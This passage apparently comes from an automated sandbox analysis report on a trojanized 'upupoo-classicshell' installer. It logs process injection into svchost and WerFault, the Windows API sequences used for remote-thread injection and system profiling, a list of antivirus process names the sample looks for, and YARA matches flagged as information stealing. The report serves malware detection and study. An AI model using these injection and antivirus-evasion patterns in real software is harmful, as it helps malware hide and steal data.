Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AA0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754AC0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC80000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Users\Public\Documents\upupoo-classicshell.exe base: C00000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D754B20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 50E0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428D8A0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3010000
Source: C:\Program Files\upupoo-classicshell.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 170000
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 28F0000
Source: C:\Program Files\upupoo-classicshell.exe | Code function: GetModuleHandleW,?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,Sleep,FindWindowW,FindWindowExW,?DllLogToFile@@YAXPB_W0ZZ,Sleep,GetWindowThreadProcessId,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,CloseHandle,?DllLogToFile@@YAXPB_W0ZZ,?FindTaskBar@@YAPAUHWND__@@K@Z,?FindTaskBar@@YAPAUHWND__@@K@Z,?DllLogToFile@@YAXPB_W0ZZ,Sleep,?ToggleStartMenu@@YAPAUHWND__@@H_N@Z,?g_TaskBar@@3PAUHWND__@@A,GetWindowThreadProcessId,?HookInject@@YGJHIJ@Z,?HookInject@@YGJHIJ@Z,SetWindowsHookExW,GetLastError,?DllLogToFile@@YAXPB_W0ZZ,?g_TaskBar@@3PAUHWND__@@A,PostMessageW, explorer.exe 3_2_00C21000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 4_2_04DF7830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 4_2_04DF7830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 12_2_052B7830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 12_2_052B7830
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C21CE0 ?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,GetModuleHandleW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?WaitDllInitThread@@YAXXZ,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLogToFile@@YAXPB_W0ZZ,MessageBoxW,_memset,DoEnvironmentSubstW,GetFileAttributesW,GetModuleFileNameW,CoInitialize,ShellExecuteW,CoUninitialize,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,RegCloseKey,?DllGetSettingInt@@YAHPB_W@Z,Sleep,RegCloseKey,?WaitDllInitThread@@YAXXZ,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,?DllGetSettingInt@@YAHPB_W@Z,Sleep,?WaitDllInitThread@@YAXXZ,RegSetValueExW,_memset,DoEnvironmentSubstW,DoEnvironmentSubstW,_memset,DoEnvironmentSubstW,_memset,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,FormatMessageW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,RegCloseKey,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllExecuteNamedCommand@@YA_NPB_W@Z,PeekMessageW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,CoUninitialize,?WaitDllInitThread@@YAXXZ,GetCurrentDirectoryW,PathAppendW,PathAddExtensionW,LoadLibraryExW,?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,GetModuleFileNameW,PathFindFileNameW,SetCurrentDirectoryW,CoInitialize,SHEvaluateSystemCommandTemplate,_memset,ShellExecuteExW,CoUninitialize,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllImportSettingsXml@@YA_NPB_W@Z,CoUninitialize,CoInitialize,?DllExportSettingsXml@@YA_NPB_W@Z,CoUninitialize,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,SetUnhandledExceptionFilter,GetUserNameW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserObjectInformationW,_malloc,GetUserObjectInformationW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,FindWindowExW,FindWindowExW,GetWindowThreadProcessId,CreateMutexW,GetLastError,GetLastError,GetLastError,AllowSetForegroundWindow,FindWindowW,AllowSetForegroundWindow,?FindTaskBar@@YAPAUHWND__@@K@Z,RegisterWindowMessageW,PostMessageW,WaitForSingleObject,ReleaseMutex,?DllLogToFile@@YAXPB_W0ZZ,GetDesktopWindow,FindWindowExW,RegisterWindowMessageW,PostMessageW,ReleaseMutex,OleInitialize,?DllUpdateSettings@@ 3_2_00C21CE0
                      Source: C:\Users\user\Desktop\setupa.exeProcess created: C:\Program Files\upupoo-classicshell.exe "C:\Program Files\upupoo-classicshell.exe"
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: svchost.exe, 0000000C.00000002.3346680855.0000000004900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: svchost.exe, 0000000C.00000002.3346680855.0000000004900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 min642294Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: upupoo-classicshell.exeBinary or memory string: Shell_TrayWnd
                      Source: upupoo-classicshell.exeBinary or memory string: Progman
                      Source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindowp[
                      Source: svchost.exe, 0000000C.00000002.3347030339.000000000492C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: minProgram Manager
                      Source: svchost.exe, 00000004.00000002.3346595282.0000000004500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 192.168.2.5 0 min642294Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: upupoo-classicshell.exe.0.drBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindowp[A
                      Source: upupoo-classicshell.exe.0.drBinary or memory string: @StartMenu: end message loopStartMenu: start message loopChangeWindowMessageFilterExTaskbarCreatedShell_TrayWndStartMenu: exit (mutex exists)StartHookWindowStartMenu: mutex %sClassicStartMenu.Mutex.%s.%sDefault-nohook-backup -xml -reloadsettings-exit-settings-open-toggle-togglenew-runasClassicShell.admxClassicShell.admlClassicShellADMX.txtClassicStartMenu.admxClassicStartMenu.admlClassicStartMenuADMX.txt.dll-saveadmx -cmd %s%s
                      Source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: StartMenu: end message loopStartMenu: start message loopChangeWindowMessageFilterExTaskbarCreatedShell_TrayWndStartMenu: exit (mutex exists)StartHookWindowStartMenu: mutex %sClassicStartMenu.Mutex.%s.%sDefault-nohook-backup -xml -reloadsettings-exit-settings-open-toggle-togglenew-runasClassicShell.admxClassicShell.admlClassicShellADMX.txtClassicStartMenu.admxClassicStartMenu.admlClassicStartMenuADMX.txt.dll-saveadmx -cmd %s%s
                      Source: upupoo-classicshell.exeBinary or memory string: StartMenu: can't find Progman, retrying
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD0470 cpuid 1_2_00000140ADFD0470
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,0_2_00007FF689731AA4
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,0_2_00007FF689731BA4
                      Source: C:\Users\user\Desktop\setupa.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF68973210C
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF689641D98
                      Source: C:\Users\user\Desktop\setupa.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,0_2_00007FF68964489A
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: GetLocaleInfoA,3_2_00C2FF7B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,wsprintfW,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_04DF5430
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,wsprintfW,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,12_2_052B5430
                      Source: C:\Users\user\Desktop\setupa.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689644E3A __crtFlsAlloc,GetSystemTimeAsFileTime,0_2_00007FF689644E3A
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689727528 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF689727528
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641433 Concurrency::details::ResourceManager::RetrieveSystemVersionInformation,GetVersionExW,0_2_00007FF689641433
                      Source: C:\Users\user\Desktop\setupa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: svchost.exeBinary or memory string: acs.exe
                      Source: svchost.exeBinary or memory string: avcenter.exe
                      Source: svchost.exeBinary or memory string: kxetray.exe
                      Source: svchost.exeBinary or memory string: vsserv.exe
                      Source: svchost.exeBinary or memory string: avp.exe
                      Source: svchost.exeBinary or memory string: cfp.exe
                      Source: svchost.exeBinary or memory string: KSafeTray.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exeBinary or memory string: 360Safe.exe
                      Source: svchost.exeBinary or memory string: 360tray.exe
                      Source: svchost.exeBinary or memory string: rtvscan.exe
                      Source: svchost.exeBinary or memory string: TMBMSRV.exe
                      Source: svchost.exeBinary or memory string: ashDisp.exe
                      Source: svchost.exeBinary or memory string: 360Tray.exe
                      Source: svchost.exeBinary or memory string: avgwdsvc.exe
                      Source: svchost.exeBinary or memory string: AYAgent.aye
                      Source: svchost.exeBinary or memory string: RavMonD.exe
                      Source: svchost.exeBinary or memory string: QUHLPSVC.EXE
                      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                      Source: svchost.exeBinary or memory string: Mcshield.exe
                      Source: svchost.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3300f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3a05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.raw.unpack, type: UNPACKEDPE
